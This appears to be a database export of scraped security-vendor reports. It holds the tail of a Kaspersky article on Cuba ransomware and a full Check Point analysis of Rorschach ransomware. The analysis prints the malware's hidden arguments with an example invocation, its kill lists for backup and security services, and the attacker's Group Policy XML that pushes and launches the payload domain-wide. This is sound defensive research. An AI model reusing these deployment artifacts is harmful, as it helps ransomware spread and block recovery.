of the system. The driver runs inside the kernel memory, and it can execute any operations just like the kernel itself. The driver can get access to critical security structures and modify those. Modifications like that make the system liable to attacks that use privilege escalation, disabling of OS security services, and arbitrary reading and writing.\nThe Lazarus gang made use of that technique in 2021 as they gained write access to kernel memory and disabled Windows security features by abusing a Dell driver that contained the CVE-2021-21551 vulnerability.\nThere is no sure-fire defense from legitimate drivers, because any driver could prove to have a security flaw. Microsoft has published a list of recommendations to protect against this type of techniques:\nEnable Hypervisor-Protected Code Integrity.\nEnable Memory Integrity.\nEnable validation of driver digital signatures.\nUse the vulnerable driver blocklist.\nHowever, studies suggest that the recommendations are irrelevant even with every Windows protection feature enabled, and attacks like these go through anyway.\nTo counter this technique, many security vendors started adding a self-defense module into their products that prevents malware from terminating processes and blocks every attempt at exploiting vulnerable drivers. Our products have that feature too, and it proved effective during the incident.\nConclusion\nThe Cuba cybercrime gang employs an extensive arsenal of both publicly available and custom-made tools, which it keeps up to date, and various techniques and methods including fairly dangerous ones, such as BYOVD. Combating attacks at this level of complexity calls for sophisticated technology capable of detecting advanced threats and protecting security features from being disabled, and a massive, continuously updated threat knowledge base that helps to detect malicious artifacts manually.\nThe incident detailed in this article shows that investigation of real-life cyberattacks and incident response, such as Managed Detection and Response (MDR), are sources of the latest information about malicious tactics, techniques and procedures. In particular, during this investigation, we discovered new and previously undetected samples of the Cuba malware, and artifacts suggesting that at least some of the gang members spoke Russian.\nThat said, effective investigation and response begin with knowledge of current cyberthreats, which is available from Threat Intelligence services. At Kaspersky, the Threat Intelligence and MDR teams work closely while exchanging data and enhancing their services all the time.\nAppendix\nSigma and YARA rules: https://github.com/BlureL/SigmaYara-Rules\nIndicators of Compromise: Download PDF\nMitre ATT&CK matrices: Download PDF\nBACKDOOR\nDRIVERS\nINCIDENT RESPONSE\nMALWARE\nMALWARE DESCRIPTIONS\nMALWARE TECHNOLOGIES\nRANSOMWARE\nRUSSIAN-SPEAKING CYBERCRIME\nSECURITY SERVICES\nTROJAN\nVULNERABILITIES\nFrom Caribbean shores to your devices: analyzing Cuba ransomware\nYour email address will not be published. Required fields are marked *\nName *\nEmail *\n  COMMENT\nPosted on September 13, 2023. 7:25 pm\ngreat article, however iocs in pdf are formatted as a picture making it impossible to copy/use any\nReply\nSECURELIST\nPosted on September 14, 2023. 11:04 am\nHi Comment!\nThank you for your feedback! Fixed it.\nReply\nTable of Contents\nIntroduction\nCuba ransomware gang\nVictimology\nRansomware\nCuba extortion model\nArsenal\nProfits\nInvestigation of a Cuba-related incident and analysis of the malware\nHost: SRV_STORAGE\nBughatch\nSRV_Service host\nVeeamp\nAvast Anti-Rootkit driver\nBurntcigar\nSRV_MAIL host (Exchange server)\nSqlDbAdmin\nCobalt Strike\nNew malware\nBYOVD (Bring Your Own Vulnerable Driver)\nConclusion\nAppendix\nSubscribe to our weekly e-mails\nThe hottest research right in your inbox\nI agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.\nSubscribe\nIN THE SAME CATEGORY\nUnderstanding Malware-as-a-Service\nThe nature of cyberincidents in 2022\nManaged Detection and Response in 2022\nSelecting the right MSSP: Guidelines for making an objective decision\nUnderstanding metrics to measure SOC effectiveness\nLATEST POSTS\nINDUSTRIAL THREATS\nThreat landscape for industrial automation systems. Statistics for H1 2023\nKASPERSKY ICS CERT\nRESEARCH\nFree Download Manager backdoored – a possible supply chain attack on Linux machines\nGEORGY KUCHERIN\nLEONID BEZVERSHENKO\nSOC, TI AND IR POSTS\nFrom Caribbean shores to your devices: analyzing Cuba ransomware\nALEXANDER KIRICHENKO\nGLEB IVANOV\nMALWARE DESCRIPTIONS\nEvil Telegram doppelganger attacks Chinese users\nIGOR GOLOVIN\nLATEST WEBINARS\nCYBERTHREAT TALKS\n12 SEP 2023, 4:00PM\n60 MIN\n2023 APT Landscape Unveiled: Trends, Challenges, Solutions\nDMITRY GALOV\nDAN DEMETER\nMOHAMAD AMIN HASBINI\nDAVID EMM\nCYBERTHREAT TALKS\n22 AUG 2023, 4:00PM\n60 MIN\nCybersecurity risks in alternative energy sources\nVLADIMIR DASHCHENKO\nSTEPHAN GERLING\nTECHNOLOGIES AND SERVICES\n15 AUG 2023, 4:00PM\n60 MIN\nSecuring ICS Workstations: Vulnerability Identification with OVAL\nPAVEL NESTEROV\nCYBERTHREAT TALKS\n20 JUN 2023, 4:00PM\n60 MIN\nUnveiling the Darknet’s Malware-as-a-Service model\nALEXANDER ZABROVSKY\nREPORTS\nFocus on DroxiDat/SystemBC\nAn unknown actor targeted an electric utility in southern Africa with Cobalt Strike beacons and DroxiDat, a new variant of the SystemBC payload. We speculate that this incident was in the initial stages of a ransomware attack.\nAPT trends report Q2 2023\nThis is our latest summary of the significant events and findings, focusing on activities that we observed during Q2 2023.\nOperation Triangulation: iOS devices targeted with previously unknown malware\nWhile monitoring the traffic of our own corporate Wi-Fi network, we noticed suspicious activity that originated from several iOS-based phones. We created offline backups of the devices, inspected them and discovered traces of compromise.\nMeet the GoldenJackal APT group. Don’t expect any howls\nGoldenJackal is an APT group, active since 2019, that usually targets government and diplomatic entities in the Middle East and South Asia. The main feature of this group is a specific toolset of .NET malware, JackalControl, JackalWorm, JackalSteal, JackalPerInfo and JackalScreenWatcher.\nSUBSCRIBE TO OUR WEEKLY E-MAILS\nThe hottest research right in your inbox\nI agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.\nSubscribe\nTHREATS\nAPT (Targeted attacks)\nSecure environment (IoT)\nMobile threats\nFinancial threats\nSpam and phishing\nIndustrial threats\nWeb threats\nVulnerabilities and exploits\nCATEGORIES\nAPT reports\nMalware descriptions\nSecurity Bulletin\nMalware reports\nSpam and phishing reports\nSecurity technologies\nResearch\nPublications\nOTHER SECTIONS\nArchive\nAll tags\nWebinars\nAPT Logbook\nStatistics\nEncyclopedia\nThreats descriptions\nKSB 2022\n© 2023 AO Kaspersky Lab. All Rights Reserved.\nRegistered trademarks and service marks are the property of their respective owners.\nPrivacy Policy\nLicense Agreement\nCookies",
  "status": "COMPLETE",
  "report_type": "WEBSITE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-10-02T17:15:37.369Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "651b16ad4870a8160e460e2a"
  },
  "name": "Rorschach Ransomware",
  "file_type": null,
  "website_url": "https://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/",
  "website_title": "Rorschach – A New Sophisticated and Fast Ransomware - Check Point Research",
  "file_name": null,
  "file_size": null,
  "content": "RORSCHACH – A NEW SOPHISTICATED AND FAST RANSOMWARE\nApril 4, 2023\nResearch by: Jiri  Vinopal, Dennis Yarizadeh and Gil Gekker\nKey Findings:\nCheck Point Research (CPR) and Check Point Incident Response Team (CPIRT) encountered a previously unnamed ransomware strain, we dubbed Rorschach, deployed against a US-based company.\nRorschach ransomware appears to be unique, sharing no overlaps that could easily attribute it to any known ransomware strain. In addition, it does not bear any kind of branding which is a common practice among ransomware groups.\nThe ransomware is partly autonomous, carrying out tasks that are usually manually performed during enterprise-wide ransomware deployment, such as creating a domain group policy (GPO). In the past, similar functionality was linked to LockBit 2.0.\nThe ransomware is highly customizable and contains technically unique features, such as the use of direct syscalls, rarely observed in ransomware. Moreover, due to different implementation methods, Rorschach is one of the fastest ransomware observed, by the speed of encryption.\nThe ransomware was deployed using DLL side-loading of a Cortex XDR Dump Service Tool, a signed commercial security product, a loading method which is not commonly used to load ransomware. The vulnerability was properly reported to Palo Alto Networks.\nIntroduction\nWhile responding to a ransomware case against a US-based company, the CPIRT recently came across a unique ransomware strain deployed using a signed component of a commercial security product. Unlike other ransomware cases, the threat actor did not hide behind any alias and appears to have no affiliation to any of the known ransomware groups. Those two facts, rarities in the ransomware ecosystem, piqued CPR interest and prompted us to thoroughly analyze the newly discovered malware.\nThroughout its analysis, the new ransomware exhibited unique features. A behavioral analysis of the new ransomware suggests it is partly autonomous, spreading itself automatically when executed on a Domain Controller (DC), while it clears the event logs of the affected machines. In addition, it’s extremely flexible, operating not only based on a built-in configuration but also on numerous optional arguments which allow it to change its behavior according to the operator’s needs. While it seems to have taken inspiration from some of the most infamous ransomware families, it also contains unique functionalities, rarely seen among ransomware, such as the use of direct syscalls.\nThe ransomware note sent out to the victim was formatted similarly to Yanluowang ransomware notes, although other variants dropped a note that more closely resembled DarkSide ransomware notes (causing some to mistakenly refer to it as DarkSide). Each person who examined the ransomware saw something a little bit different, prompting us to name it after the famous psychological test – Rorschach Ransomware.\nExecution Flow\nAs observed in the wild, Rorschach execution uses these three files:\ncy.exe – Cortex XDR Dump Service Tool version 7.3.0.16740, abused to side-load winutils.dll\nwinutils.dll – Packed Rorschach loader and injector, used to decrypt and inject the ransomware.\nconfig.ini – Encrypted Rorschach ransomware which contains all the logic and configuration.\nUpon execution of cy.exe, due to DLL side-loading, the loader/injector winutils.dll is loaded into memory and runs in the context of cy.exe. The main Rorschach payload config.ini is subsequently loaded into memory as well, decrypted and injected into notepad.exe, where the ransomware logic begins.\nFigure 1 – Rorschach’s High Level Execution Flow on both endpoints and on Domain Controllers.\nSecurity Solution Evasion\nRorschach spawns processes in an uncommon way, running them in SUSPEND mode and giving out falsified arguments to harden analysis and remediation efforts. The falsified argument, which consists of a repeating string of the digit 1 based on the length of the real argument, rewritten in memory and replaced with the real argument, resulting in a unique execution:\nFigure 2 – Rorschach’s process tree spawns processes with falsified arguments.\nThe ransomware uses this technique to run the following operations:\nAttempt to stop a predefined list of services, using net.exe stop.\nDelete shadow volumes and backups to harden recovery, using legitimate Windows tools such as vssadmin.exe, bcdedit.exe, wmic.exe, and wbadmin.exe\nRun wevutil.exe to clear the following Windows event logs: Application, Security, System and Windows Powershell.\nDisable the Windows firewall, using netsh.exe\nSelf-propagation\nWhen executed on a Windows Domain Controller (DC), the ransomware automatically creates a Group Policy, spreading itself to other machines within the domain. Similar functionality was linked in the past to LockBit 2.0, although the Rorschach Ransomware GPO deployment is carried out differently, as described below:\nRorschach copies its files into the scripts folder of the DC, and deletes them from the original location.\nRorschach then creates a group policy (see Appendix C) that copies itself into the %Public% folder of all workstations in the domain.\nThe ransomware creates another group policy in an attempt to kill a list of predefined list of processes. This is done by creating a schedule task invoking taskkill.exe.\nFinally, Rorschach creates another group policy that registers a scheduled task which runs immediately and upon user logon, to run Rorschach’s main executable with the relevant arguments.\nOur colleagues in AhnLab published a more thorough behavioral analysis of another Rorschach variant which provides further details into the operations.\nRansomware Analysis\nIn addition to the ransomware’s uncommon behavior described above, the Rorschach binary itself contains additional interesting features, differentiating it further from other ransomware.\nBinary and Anti-Analysis Protection\nThe actual sample is protected carefully, and requires quite a lot of work to access. First, the initial loader/injector winutils.dll is protected with UPX-style packing. However, this is changed in such a way that it isn’t readily unpacked using standard solutions and requires manual unpacking. After unpacking, the sample loads and decrypts config.ini, which contains the ransomware logic.\nAfter Rorschach is injected into notepad.exe, it’s still protected by VMProtect. This results in a crucial portion of the code being virtualized in addition to lacking an IAT table. Only after defeating both of these safeguards is it possible to properly analyze the ransomware logic.\nSecurity Solution Evasion\nAlthough Rorschach is used solely for encrypting an environment, it incorporates an unusual technique to evade defense mechanisms. It makes direct system calls using the “syscall” instruction. While previously observed in other strains of malware, it’s quite startling to see this in ransomware.\nThe procedure involves utilizing the instruction itself, and it goes as follows:\nThe ransomware finds the relevant syscall numbers for NT APIs, mainly related to file manipulation.\nRorschach then stores the numbers in a table for future use.\nWhen needed, it calls a stub routine that uses the number directly with the syscall instruction instead of using the NT API.\nIn other words, the malware first creates a syscall table for NT APIs used for file encryption:\nFigure 3 – Creation of syscall table for certain NT APIs.\nThe end of the table is a section with the relevant syscall numbers:\nFigure 4 – Section containing the syscall table.\nThe example below shows how the syscall numbers are used:\nFigure 5 – Example use of direct syscall.\nThis obfuscated process is not required for the ransomware encryption logic, which suggests it was developed to bypass security solutions monitoring direct API calls.\nCommand Line Arguments\nIn addition to the hardcoded configuration, the ransomware comes with multiple built-in options, probably for the operators comfort. All of them are hidden, obfuscated, and not accessible without reverse-engineering the ransomware. This table contains some of the arguments that we discovered:\nArgument Example Parameter Description\n–run =1234 Password needed to run the sample, possibly built on demand.\n–nomutex =1 Do not create a mutex, therefore do not insure that only a single instance is running.\n–log =1 Create log files.\n–nodel =0 Do not self-delete on execution.\n–path =“C:” Encrypt only the following path.\n–noshare =1 Do not encrypt shares.\n–pt =”C:.dll” Explicitly state the loader DLL.\n–cg =”C:.ini” Explicitly state the configuration file that stores the malware.\n–we =”C:.exe” Explicitly state the main executable.\n–diskpart =1 Run diskpart.exe /s AppData_x.txt that removes read- only volume attributes.\n–nobk =1 Do not change the wallpaper of the infected machine.\n–thread =4 Number of threads per CPU.\n–at =2023/03/24 05:04:20 Activation time (trigger time).\n–nomail =1 Do not create a ransom note.\nThis is only a partial list, with additional arguments suggesting networking capabilities, such as listen, srv and hostfile.\nExample of how some of these arguments are used:\ncy.exe --run=1234 --nomutex=0 --log=1 --nodel=1 --path=\"C:\\Myfolder\" --full=1 --diskpart=1 --nobk=0\nLanguage Based Protection\nBefore encrypting the target system, the sample runs two system checks that can halt its execution:\nIt uses GetSystemDefaultUILanguage and GetUserDefaultUILanguage to determine what language the user is using.\nIt exits if the return value is commonly used in CIS countries:\n{\n    0x042b: \"Armenian_Armenia\",\n    0x042c: \"Azeri_Latin\",\n    0x043f: \"Kazakh\",\n    0x082c: \"Azeri_Cyrillic\",\n    0x419: \"Russian\",\n    0x422: \"Ukrainian\",\n    0x423: \"Belarusian\",\n    0x428: \"Tajik\",\n    0x437: \"Georgian\",\n    0x440: \"Kyrgyz_Cyrillic\",\n    0x442: \"Turkmen\",\n    0x443: \"Uzbek_Latin\",\n    0x819: \"Russian_Moldava\",\n    0x843: \"Uzbek_Cyrillic\"\n}\nEncryption Process\nThe Rorschach ransomware employs a highly effective and fast hybrid-cryptography scheme, which blends the curve25519 and eSTREAM cipher hc-128 algorithms for encryption purposes. This process only encrypts a specific portion of the original file content instead of the entire file. The WinAPI CryptGenRandom is utilized to generate cryptographically random bytes used as a per-victim private key. The shared secret is calculated through curve25519, using both the generated private key and a hardcoded public key. Finally, the computed SHA512 hash of the shared secret is used to construct the KEY and IV for the eSTREAM cipher hc-128.\nFigure 6 – The Rorschach hybrid-cryptography scheme.\nAnalysis of Rorschach’s encryption routine suggests not only the fast encryption scheme mentioned previously but also a highly effective implementation of thread scheduling via I/O completion ports. In addition, it appears that compiler optimization is prioritized for speed, with much of the code being inlined. All of these factors make us believe that we may be dealing with one of the fastest ransomware out there.\nTo verify our hypothesis, we conducted five separate encryption speed tests in a controlled environment (with 6 CPUs, 8192MB RAM, SSD, and 220000 files to be encrypted), limited to local drive encryption only. To provide a meaningful comparison with other known fast ransomware, we compared Rorschach with the notorious LockBit v.3.\nThe result of the speed tests:\nRansomware Average approximate time of encryption\nLockBit v.3 7 minutes\nRorschach 4 minutes, 30 seconds\nIt turned out that we have a new speed demon in town. What’s even more noteworthy is that the Rorschach ransomware is highly customizable. By adjusting the number of encryption threads via the command line argument --thread, it can achieve even faster times.\nTechnical Similarity to Other Ransomware\nWhen we compared Rorschach to other well-known ransomware families, we noticed that Rorschach uses a variety of time-honored methods together with some novel ideas in the ransomware industry. The name itself, “Rorschach”, is quite self-explanatory; with deep reverse engineering of the code and its logic, we found certain similarities with some of the more technically advanced and established ransomware groups.\nWe discussed Rorschach’s hybrid-cryptography scheme in detail above, but we suspect that this routine was borrowed from the leaked source code of Babuk ransomware. See the following code snippets as examples:\nFigure 7 – Hybrid-cryptography scheme of Rorschach vs. Babuk.\nRorschach’s inspiration from Babuk is evident in various routines, including those responsible for stopping processes and services. In fact, the code used to stop services through the service control manager appears to have been directly copied from Babuk’s source code:\nFigure 8 – Stopping predefined list of services – Rorschach vs. Babuk.\nIt is also worth noting that the list of services to be stopped in Rorschach’s configuration is identical to that in the leaked Babuk source code. However, the list of processes to be stopped differs slightly, as Rorschach omits notepad.exe, which is used as a target for code injection.\nRorahsach takes inspiration from another ransomware strain: LockBit. First, the list of languages used to halt the malware is exactly the same list that was used in LockBit v2.0  (although the list is commonly used by many Russian speaking groups, and not just LockBit). However, the I/O Completion Ports method of thread scheduling is another component where Rorschach took some inspiration from LockBit. The final renaming of the encrypted machine files in Rorschach is implemented via NtSetInformationFile using FileInformationClass FileRenameInformation, just like in LockBit v2.0.\nFigure 9 – Renaming of encrypted file using NtSetInformationFile.\nAs noted before, Rorschach’s code is protected and obfuscated in a way that is unusual for ransomware, and is compiled with compiler optimization to favor speed and code inlining as much as possible. This makes finding similarities with other well-known ransomware families a real brain-buster. But we can still say that Rorschach took the best from the ransomware families with the highest reputation, and then added some unique features of its own.\nRansom Notes\nAs we noted, Rorschach does not exhibit any clear-cut overlaps with any of the known ransomware groups but does appear to draw inspiration from some of them.\nWe mentioned previously that Ahnlab reported a similar attack earlier this year. While it was carried out through different means, the ransomware described in the report triggers an almost identical execution flow. However, the resulting ransom note was completely different. The note was actually very similar to those issued by DarkSide, which probably led to this new ransomware being named “DarkSide,” despite the group being inactive since May 2021.\nThe Rorschach variant we analyzed leaves a different ransom note based on the structure used by Yanlowang, another ransomware group:\nFigure 10 – Ransom note from Rorschach.\nConclusion\nOur analysis of Rorschach reveals the emergence of a new ransomware strain in the crimeware landscape. Its developers implemented new anti-analysis and defense evasion techniques to avoid detection and make it more difficult for security software and researchers to analyze and mitigate its effects. Additionally, Rorschach appears to have taken some of the ‘best’ features from some of the leading ransomwares leaked online, and integrated them all together. In addition to Rorschach’s self-propagating capabilities, this raises the bar for ransom attacks. The operators and developers of the Rorschach ransomware remain unknown. They do not use branding, which is relatively rare in ransomware operations.\nOur findings underscore the importance of maintaining strong cybersecurity measures to prevent ransomware attacks, as well as the need for continuous monitoring and analysis of new ransomware samples to stay ahead of evolving threats. As these attacks continue to grow in frequency and sophistication, it is essential for organizations to remain vigilant and proactive in their efforts to safeguard against these threats.\nHarmony Endpoint provides runtime protection against ransomware with instant automated remediation, even in offline mode.\nWhen running on a machine infected with the Rorschach ransomware, Harmony Endpoint Anti-ransomware detected the encryption process in different folders, including modifications made to Harmony Endpoint ‘honeypot’ files. It ran a ranking algorithm that provided a verdict identifying the process as a ransomware.  \nSamples/IOCs\nFiles\nName Hash Comments\ncy.exe 2237ec542cdcd3eb656e86e43b461cd1 PA Cortex Dump Service Tool (benign file)\nwinutils.dll 4a03423c77fe2c8d979caca58a64ad6c Loader and injector into notepad.exe\nconfig.ini 6bd96d06cd7c4b084fe9346e55a81cf9 Encrypted ransomware payload\nAppendix A – Services and processes terminated through GPO by Rorschach\nThe following services are stopped through a GPO issued by Rorschach, probably to prevent conflicting write orders to Database files (and thus preventing encryption):\nSQLPBDMS\nSQLPBENGINE\nMSSQLFDLauncher\nSQLSERVERAGENT\nMSSQLServerOLAPService\nSSASTELEMETRY\nSQLBrowser\nSQL Server Distributed Replay Client\nSQL Server Distributed Replay Controller\nMsDtsServer150\nSSISTELEMETRY150\nSSISScaleOutMaster150\nSSISScaleOutWorker150\nMSSQLLaunchpad\nSQLWriter\nSQLTELEMETRY\nMSSQLSERVER\nThe following processes are killed using a group policy (scheduled task) issued by Rorschach executing C:\\windows\\system32\\taskkill.exe. Some are likely terminated to prevent write conflicts, and some are security solutions:\nwxServer.exe\nwxServerView.exe\nsqlmangr.exe\nRAgui.exe\nsupervise.exe\nCulture.exe\nDefwatch.exe\nhttpd.exe\nsync-taskbar\nsync-worker\nwsa_service.exe\nsynctime.exe\nvxmon.exe\nsqlbrowser.exe\ntomcat6.exe\nSqlservr.exe\nAppendix B – Hardcoded Rorschach configuration\nThe following is a list of services, hardcoded in its configuration, to be stopped via the service control manager:\nAcronisAgent\nAcrSch2Svc\nbackup\nBackupExecAgentAccelerator\nBackupExecAgentBrowser\nBackupExecDiveciMediaService\nBackupExecJobEngine\nBackupExecManagementService\nBackupExecRPCService\nBackupExecVSSProvider\nCAARCUpdateSvc\nCASAD2DWebSvc\nccEvtMgr\nccSetMgr\nDefWatch\nGxBlr\nGxCIMgr\nGxCVD\nGxFWD\nGxVss\nIntuit.QuickBooks.FCS\nmemtas\nmepocs\nPDVFSService\nQBCFMonitorService\nQBFCService\nQBIDPService\nRTVscan\nSavRoam\nsophos\nsql\nstc_raw_agent\nsvc$\nveeam\nVeeamDeploymentService\nVeeamNFSSvc\nVeeamTransportSvc\nVSNAPVSS\nvss\nYooBackup\nYooIT\nzhudongfangyu\nThe following is a hardcoded list of directories and files to be omitted from encryption:\n.\n..\n#recycle\n$Recycle.Bin\n1_config.ini\nAhnlab\nAll Users\nAppData\nAUTOEXEC.BAT\nautoexec.bat\nautorun.inf\nbegin.txt\nBoot\nboot.ini\nbootfont.bin\nbootmgfw.efi\nbootmgr\nbootmgr.efi\nbootsect.bak\nconfig.ini\ndesktop.ini\nfinish.txt\nGoogle\niconcache.db\nInternet Explorer\nMozilla\nMozilla Firefox\nNETLOGON\nntldr\nntuser.dat\nNTUSER.DAT\nntuser.dat.log\nntuser.dat.LOG1\nntuser.dat.LOG2\nntuser.ini\nOpera\nOpera Software\nPolicies\nProgram Files\nProgram Files (x86)\nProgramData\nscripts\nSYSVOL\nthumbs.db\nTor Browser\nWindows\nWINDOWS\nWindows.old\nThe following is a list of process names that during Rorschach’s execution these names are compared to those running on the machine and killed if matched. This is done through a combination of CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, OpenProcess, and TerminateProcess. There is some overlap and redundancy to the list of services killed via the service control manager.\nAcronisAgent\nAcrSch2Svc\nagntsvc.exe\nBackExecRPCService\nbackup\nBackupExecAgentAccelerator\nBackupExecDiveciMediaService\nBackupExecJobEngine\nbedbg\nCAARCUpdateSvc\nccEvtMgr\nCulserver\ndbeng50.exe\ndbeng8\ndbsnmp.exe\ndbsrv12.exe\nDefWatch\nencsvc.exe\nexcel.exe\nfirefox.exe\ninfopath.exe\nIntuit.QuickBooks.FCS\nisqlplussvc.exe\nmemtas\nmepocs\nmsaccess.exe\nMSExchange\nmsftesql-Exchange\nmsmdsrv\nmspub.exe\nMSSQL\nmydesktopqos.exe\nmydesktopservice.exe\nocautoupds.exe\nocomm.exe\nocssd.exe\nonenote.exe\noracle.exe\noutlook.exe\nPDVFSService\npowerpnt.exe\nQBCFMonitorService\nQBFCService\nQBIDPService\nSavRoam\nsophos\nsqbcoreservice.exe\nsql.exe\nsqladhlp\nSQLADHLP\nsqlagent\nSQLAgent\nSQLAgent$SHAREPOINT\nSQLBrowser\nSQLWriter\nsteam.exe\nsynctime.exe\ntbirdconfig.exe\nthebat.exe\nthunderbird.exe\ntomcat6\nveeam\nVeeamDeploymentService\nVeeamNFSSvc\nVeeamTransportSvc\nvisio.exe\nvmware-converter\nvmware-usbarbitator64\nWinSAT.exe\nwinword.exe\nwordpad.exe\nwrapper.exe\nWSBExchange\nxfssvccon.exe\nYooBackup\nAppendix C – Group Policies executed by Rorschach\nTransferring its own files to each workstation:\n<Files clsid=\"{215B2E53-57CE-475c-80FE-9EEC14635851}\">\n    <File clsid=\"{50BE44C8-567A-4ed1-B1D0-9234FE1F38AF}\" name=\"0305_winutils.dll\" status=\"0305_winutils.dll\" image=\"2\" changed=\"2023-03-05 08:51:22\" uid=\"{3F490769-A341-4220-90A3-51964B4A0C12}\" bypassErrors=\"1\">\n        <Properties action=\"U\" fromPath=\"\\\\**REDACTED**\\sysvol\\**REDACTED**.local\\scripts\\winutils.dll\" targetPath=\"%Public%\\winutils.dll\" readOnly=\"0\" archive=\"1\" hidden=\"0\" suppress=\"0\" />\n    </File>\n    <File clsid=\"{50BE44C8-567A-4ed1-B1D0-9234FE1F38AF}\" name=\"0305_config.ini\" status=\"0305_config.ini\" image=\"2\" changed=\"2023-03-05 08:51:22\" uid=\"{F513F283-3C66-4C71-9B9B-4CE9BBFCEEF1}\" bypassErrors=\"1\"\n        <Properties action=\"U\" fromPath=\"\\\\**REDACTED**.local\\sysvol\\**REDACTED**.local\\scripts\\config.ini\" targetPath=\"%Public%\\config.ini\" readOnly=\"0\" archive=\"1\" hidden=\"0\" suppress=\"0\" />\n    </File>\n    <File clsid=\"{50BE44C8-567A-4ed1-B1D0-9234FE1F38AF}\" name=\"0305_cy.exe\" status=\"0305_cy.exe\" image=\"2\" changed=\"2023-03-05 08:51:22\" uid=\"{0A16D469-2648-4849-99C8-95D1B777D59A}\" bypassErrors=\"1\">\n        <Properties action=\"U\" fromPath=\"\\\\**REDACTED**.local\\sysvol\\**REDACTED**.local\\scripts\\cy.exe\" targetPath=\"%Public%\\cy.exe\" readOnly=\"0\" archive=\"1\" hidden=\"0\" suppress=\"0\" />\n    </File>\n</Files>\nExecuting a scheduled task to run the attack:\n<TaskV2 clsid=\"{D8896631-B747-47a7-84A6-C155337F3BC8}\" name=\"2_0305_cy.exe\" image=\"2\" changed=\"**REDACTED**\" uid=\"{3772E17D-6354-4DF1-A73B-8868AC352B23}\">\n    <Properties action=\"U\" name=\"2_0305_cy.exe\" runAs=\"%LogonDomain%\\%LogonUser%\" logonType=\"InteractiveToken\">\n        <Task version=\"1.2\">\n            <RegistrationInfo>\n                <Author>**REDACTED**\\Administrador</Author>\n                <Description></Description>\n            </RegistrationInfo>\n            <Principals>\n                <Principal id=\"Author\">\n                    <UserId>%LogonDomain%\\%LogonUser%</UserId>\n                    <LogonType>InteractiveToken</LogonType>\n                    <RunLevel>HighestAvailable</RunLevel>\n                </Principal>\n            </Principals>\n            <Settings>\n                <IdleSettings>\n                    <Duration>PT10M</Duration>\n                    <WaitTimeout>PT1H</WaitTimeout>\n                    <StopOnIdleEnd>false</StopOnIdleEnd>\n                    <RestartOnIdle>false</RestartOnIdle>\n                </IdleSettings>\n                <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\n                <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\n                <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\n                <AllowHardTerminate>true</AllowHardTerminate>\n                <AllowStartOnDemand>true</AllowStartOnDemand>\n                <Enabled>true</Enabled>\n                <Hidden>false</Hidden>\n                <ExecutionTimeLimit>P3D</ExecutionTimeLimit>\n                <Priority>7</Priority>\n            </Settings>\n            <Triggers>\n                <RegistrationTrigger>\n                    <Enabled>true</Enabled>\n                </RegistrationTrigger>\n                <LogonTrigger>\n                    <Enabled>true</Enabled>\n                </LogonTrigger>\n            </Triggers>\n            <Actions Context=\"Author\">\n                <Exec>\n                    <Command>%Public%\\cy.exe</Command>\n                    <Arguments>--run=**REDACTED**</Arguments>\n                </Exec>\n            </Actions>\n        </Task>\n    </Properties>\n</TaskV2>\nGO UP\nBACK TO ALL POSTS\nPOPULAR POSTS\nARTIFICIAL INTELLIGENCE\nCHATGPT\nCHECK POINT RESEARCH PUBLICATIONS\nOPWNAI : Cybercriminals Starting to Use ChatGPT\nARTIFICIAL INTELLIGENCE\nCHATGPT\nCHECK POINT RESEARCH PUBLICATIONS\nOpwnAI: AI That Can Save the Day or HACK it Away\nCHECK POINT RESEARCH PUBLICATIONS\nTHREAT RESEARCH\nBlindEagle Targeting Ecuador With Sharpened Tools\nBLOGS AND PUBLICATIONS\nJanuary 11, 2018\n‘RUBYMINER’ CRYPTOMINER AFFECTS 30% OF WW NETWORKS\nCHECK POINT RESEARCH PUBLICATIONS\nGLOBAL CYBER ATTACK REPORTS\nTHREAT RESEARCH\nFebruary 17, 2020\n“THE TURKISH RAT” EVOLVED ADWIND IN A MASSIVE ONGOING PHISHING CAMPAIGN\nAugust 11, 2017\n“THE NEXT WANNACRY” VULNERABILITY IS HERE\n123\nLet’s get in touch\nSubscribe for cpr blogs, news and more\nSubscribe Now\n© 1994-2023 Check Point Software Technologies LTD. All rights reserved.\nProperty of CheckPoint.com\nPrivacy Policy\n—Please choose an option—\nChina\nIndia\nUnited States\nIndonesia\nBrazil\nPakistan\nNigeria\nBangladesh\nRussia\nJapan\nMexico\nPhilippines\nVietnam\nEthiopia\nEgypt\nGermany\nIran\nTurkey\nDemocratic Republic of the Congo\nThailand\nFrance\nUnited Kingdom\nItaly\nBurma\nSouth Africa\nSouth Korea\nColombia\nSpain\nUkraine\nTanzania\nKenya\nArgentina\nAlgeria\nPoland\nSudan\nUganda\nCanada\nIraq\nMorocco\nPeru\nUzbekistan\nSaudi Arabia\nMalaysia\nVenezuela\nNepal\nAfghanistan\nYemen\nNorth Korea\nGhana\nMozambique\nTaiwan\nAustralia\nIvory Coast\nSyria\nMadagascar\nAngola\nCameroon\nSri Lanka\nRomania\nBurkina Faso\nNiger\nKazakhstan\nNetherlands\nChile\nMalawi\nEcuador\nGuatemala\nMali\nCambodia\nSenegal\nZambia\nZimbabwe\nChad\nSouth Sudan\nBelgium\nCuba\nTunisia\nGuinea\nGreece\nPortugal\nRwanda\nCzech Republic\nSomalia\nHaiti\nBenin\nBurundi\nBolivia\nHungary\nSweden\nBelarus\nDominican Republic\nAzerbaijan\nHonduras\nAustria\nUnited Arab Emirates\nIsrael\nSwitzerland\nTajikistan\nBulgaria\nHong Kong (China)\nSerbia\nPapua New Guinea\nParaguay\nLaos\nJordan\nEl Salvador\nEritrea\nLibya\nTogo\nSierra Leone\nNicaragua\nKyrgyzstan\nDenmark\nFinland\nSlovakia\nSingapore\nTurkmenistan\nNorway\nLebanon\nCosta Rica\nCentral African Republic\nIreland\nGeorgia\nNew Zealand\nRepublic of the 